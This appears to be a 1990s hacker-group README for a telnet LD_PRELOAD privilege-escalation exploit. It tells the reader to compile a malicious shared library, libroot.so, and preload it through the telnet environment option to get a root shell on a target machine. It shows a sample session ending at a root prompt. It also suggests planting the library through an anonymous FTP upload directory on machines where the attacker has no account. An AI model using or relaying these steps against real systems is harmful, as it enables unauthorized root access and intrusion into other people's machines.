Gday. This makefile produces a library, which when specified when initiating
a telnet session allows you to start a root shell when connecting to the
machine.

To compile this, type make all. This will compile all the files, produce a
library from the object code and name it libroot.so.

You then need to open a telnet connection to the machine where this library
resides.

-- -- -- -- --

mine% telnet
telnet> env def LD_PRELOAD /tmp/libroot.so
telnet> o
(to) target.machine

Trying xxx.xxx.xxx.xxx
Connected to xxxxxxxx.
Escape character is '^]'.

Linux 1.2.13 

login: jruser
Squidge - The Guild presents you with a setuid 0 shell
bash#

-- -- -- -- --

NOTES:
	The library you compiled *must* be on the machine you are trying to
break into. If you have an account, make it there and set the LD_PRELOAD
path to point to it in your homedir. If you have no account, try putting it
in incoming with ftp. The resultant path will be
/home/ftp/incoming/libroot.so.

If you have any problems email me at squidge@onyx.infonexus.com

ERRATA:
	At the moment, this only works for ELF machines. Support for a.out
will be added shortly.

Squidge - The Guild
